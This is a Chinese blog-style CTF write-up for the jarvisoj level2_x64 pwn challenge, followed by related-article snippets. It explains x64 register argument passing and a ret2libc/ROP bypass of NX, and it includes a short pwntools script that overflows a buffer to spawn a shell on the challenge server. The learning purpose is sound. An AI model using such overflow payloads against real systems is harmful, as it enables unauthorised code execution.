夏令营第二周pwn的level-x64题总结

最新推荐文章于 2025-01-11 20:21:31 发布
原创 最新推荐文章于 2025-01-11 20:21:31 发布 · 426 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文总结了64位pwn挑战中如何应对NX保护模式,通过return2libc技术绕过保护,并详细解释了如何利用read函数的栈溢出漏洞,找到system函数地址,构造payload获取shell。通过分析程序,找到pop_rdi;ret指令,最终成功获取远程服务器的控制权。

首先:
linux_64与linux_86(32位)的区别主要有两点:
首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是32位是通过栈传参,而64位通过edi寄存器传参,函数参数的传递方式发生了改变,x86(32位)中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。

在这里插入图片描述

做pwn的level题目的步骤(技巧):
(1)找到栈溢出地址,基本上都是buf的地址,这个需要用32位或64进行转码后存储(避免发生乱码)才能用pwntools中sendline发送到远程连接

(2)构建shellcode,基本都是“shellcode=asm(shellcraft.sh())”

(3)构建payload,payload的基本构建:payload=shellcoad+’ a’ *一个长度+p64(buf_addr),次序一定不能乱’

(4):发送payload,进行交互,得到shell的控制权,然后ls,cat flag。

今天我来总结一下pwn的level2_x64:

我们直接把题目放进ubuntu虚拟机查看题目:
在这里插入图片描述
发现题目的arch模块是64位的;NX保护模式开启,就没有办法直接插入shellcode来执行了,但是我们可以看到程序调用了system函数,
所以我们可以通过return2libc来绕过NX,直接传入binsh参数来打开服务器的shell

接下把文件放进IDAx64分析:

在这里插入图片描述

1)发现函数有system函数,于是按F5查看伪代码:找主函数(main)和vulnerable()函数在然后vulnerable()函数中有一个read函数存在栈溢出漏洞。

因为题目的NX保护模式开启,所无法构建shellcode拿到shell,所以我们要想办法泄露内存信息,找到system()函数的值,然后在传递“/bin/sh”到.bss段。因为源程序使用了write()函数和read()函数,又因为题目中有libc()函数,所以可以通过write()去输出write.got的地址,从而计算libc.so在内存中的地址

在这里插入图片描述

我们使用pop_ret将我们写到栈中的参数放到RDI中(大佬们称此为平衡栈帧)。
接下来我们只要找到一个pop rdi;ret 就可以了。
这里,我们使用ROPgadget寻找这个指令片段

在这里插入图片描述
找字符串(string):
在这里插入图片描述
快捷:
在这里插入图片描述
基础:
在这里插入图片描述
找到pop rdi ; ret 片段的地址,我们直接利用起来构造payload就行了

#!/usr/bin/env python
from pwn import *
p=remote(‘pwn2.jarvisoj.com’,9882)
p.recvuntil(‘Input:’)
system_addr=0x04004c0
pop_addr=0x04006b3
sh_addr=0x0600a90
payload=‘a’*0x80+‘a’*8+p64(pop_addr)+p64(sh_addr)+p64(system_addr)+‘a’*8
p.sendline(payload)

运行结果:

在这里插入图片描述

在这里插入图片描述
更容易理解博客:

https://www.bbsmax.com/A/l1dyPDRb5e/

MIGENGKING
关注
CTF buuoj pwn-----2:rip
bing_Max的博客
08-28 3874
CTF buuoj pwn-----2:rip 记录一下pwn的过程 同第1一样,新手学习日记,流水线记录. 打开目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
CTF buuoj pwn-----第6:jarvisoj_level0
bing_Max的博客
09-02 1201
CTF buuoj pwn-----第6:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析,IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言 记录一下pwn的过程, 新手学习日记, 流水线记录. 打开目, 连接靶机,下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'
BUUCTF(pwn)jarvisoj_level3_x64
半岛铁盒的博客
04-01 530
这道是一道简单的rop类型的目,跟之前做的目有一些差异:( 这是64位的需要一些额外的操作 ) 64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。 这里我们使用 write 函数 来泄密 libc地址 ssize_t write(int fd,const void*buf,size_t count); 参数说明: f.
Jarvis oj-pwn level2-64
hanqdi_的博客
02-09 208
pwn level2-64 检查保护机制 放入ida分析 在ida 中发现有system函数,再查找下也有binsh字符串。 由于是64位的,所以,传参数时要注意,前6个参数是存在寄存器里的。 rdi的地址 利用pop ret 指令来传递参数,pop rdi,将参数binsh弹出栈,并存入rdi寄存器中,再ret返回栈中,再执行system函数,参数从rdi中取出。 构造脚本如下: ...
CTF PWN [XMAN]level2(x64)
qq_41743240的博客
04-08 485
CTF PWN [XMAN]level2(x64) 目地址 首先进行checksec保护机制的查询 发现只开了NX,所以不能利用shellcode方式获取shell,这里采用ROP方式获取shell IDA反编译查看伪源码 程序非常简单,两个函数 main: vulnerable_function: 在vulnerable_function有个问,buf申请空间为0x80字节,然而可以读...
JarvisOj pwn level3_x64
qq_44813849的博客
07-27 618
JarvisOj pwn level3_x64 这一道level3那道很像,同样是一个压缩包里面有两个文件。 使用ROPgadget搜索操作寄存器的函数地址: 用ida打开level3_x64文件,找到主函数的地址 plt表和got表中的write地址 附上脚本 from pwn import * elf=ELF("level3_x64") write_plt=0x000000000...
pwn2_64
m0_49959202的博客
09-18 169
文章目录pwn2_641.程序分析2.栈帧设计3.exp编写 pwn2_64 1.程序分析 本和上一一样,但是是64位的,那么就需要改变传参的方式:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9 那么就需要使用rop先把需要的参数“/bin/sh”传入rdi。 2.栈帧设计 3.exp编写 from pwn import * context(log_level = 'debug', arch = 'amd64', os = 'linux') io
pwn-x64-printf泄露
08-04
x64 printf回显漏洞
CTF buuoj pwn-----第9:jarvisoj_level2
bing_Max的博客
09-27 989
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
【BUUCTF-PWN】13-jarvisoj_level2_x64
燕麦葡萄干的博客
07-05 810
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
pwn3_x64
m0_49959202的博客
09-18 319
文章目录pwn3_x641.程序分析2.栈帧设计3.exp编写 pwn3_x64 1.程序分析 file一下,发现是64位程序: checksec一下,发现pie没开: ldd一下,找到需要的动态链接库: ida分析: 思路和上一32位的一样,没啥好分析的 64位与32的不同在于传参:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9 因此需要ROP链找到rdi, rsi, rdx。 用ROPgadget查看下: 发现有现成的pop rdi; ret
pwn之jarvisoj_level2_x64
勿山几已
01-11 1079
缓冲区溢出漏洞导致漏洞利用system函数,64位程序利用rop设置函数参数
[BUUCTF]PWN——jarvisoj_level3_x64
mcmuyanga的博客
11-04 1759
jarvisoj_level3_x64 附件 步骤: 例行检查,64位程序,开启了nx保护 试运行一下程序,看看大概的情况 64位ida载入,习惯性的检索字符串,没有发现可以直接利用的system,估计使用ret2libc的方法 从main函数开始看程序 function()函数 输入点buf明显的溢出漏洞,read之前已经调用过一个write函数了,可以利用它来泄露libc版本 利用过程 泄露libc版本 64位程序传参需要用到寄存器rdi,找一下设置rdi寄存器的指令 https://
pwn——x64下的格式化字符串
qq_41560595的博客
02-16 651
x64和x86在格式化字符串传参上稍有不同,原因在于x64会把printf函数中的参数先传到6个寄存器中。下面以一道例说明。 链接:https://pan.baidu.com/s/1fgg6HRr__08fW1P0HgmaKA 提取码:1111 二进制文件拖入IDA并F5 代码吧啦吧啦一大堆,实际上就是让你猜一个flag和真正的flag比对,比对正确会给你flag。= =我要是都知道flag还要你的flag干嘛?! gdb调试 断点断在_isoc99_scanf处,输入AAAA。调试到printf时,查
CTF-PWN-level2(x64)(Jarvis OJ)
SuperGate的博客
02-15 576
这道level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。 由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。 同样的,程序中hint存入了/bin/sh,我们直接使用即可。 system函数的地址也很容易获得,剩下的就是pop e...
[BUUCTF]PWN——jarvisoj_level2_x64
BangSen1的博客
03-30 2010
jarvisoj_level2_x64 例行检查 ,64位,开启NX保护, 运行一下 用IDA打开。 systemaddr=0x40063e shalladdr=0x400A90 查看主函数,buf的长度为0x80,读取的长度为0x200,可以造成溢出漏洞。 rdiaddr= 0x4006b3 from pwn import * context(log_level = 'debug') elf = ELF('./level2_x64') p = remote('node3.buuoj.cn',
Pwn 学习 question_5 x64ROP编程
MrTreebook的博客
04-30 685
Pwn 学习 question_5 x64ROP编程1.源代码2.编译x86x643.x863.1.确定溢出量3.2.布栈3.2.1.第一次溢出3.2.2.计算libc_base3.2.3.第二次溢出3.3.exp4.x644.1.确定溢出量4.2.布栈4.2.1.第一次布栈4.2.2.计算偏移4.2.3.第二次布栈4.3.exp 1.源代码 #include<stdio.h> #include<stdlib.h> #include<unistd.h> int dofun
(Jarvis Oj)(Pwn) level3_x64
Nothing
04-24 1048
(Jarvis Oj)(Pwn) level3_x64level3的64位版本,思路和32位版本一致,不同之处就是函数的参数传递,利用寄存器,于是构造rop链。写得脚本如下: from pwn import * ...
暑期pwn! pwn! pang!(四) 64位ROP绕过 Emachine
qq_43342413的博客
07-19 609
先看看保护 是个64位的,开了栈不可执行保护,先玩玩这个程序 好了,到了开IDA的时间了,咱找到漏洞 int encrypt() { size_t v0; // rbx char s[48]; // [rsp+0h] [rbp-50h] __int16 v3; // [rsp+30h] [rbp-20h] memset(s, 0, sizeof(s)); v3 = 0; puts(“Input...
攻防世界pwn pwn-100
最新发布
01-18
### 关于攻防世界PWN-100目的解答 #### 解决方案概述 对于攻防世界的PWN-100目,通常涉及的是基础的缓冲区溢出攻击。这类目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值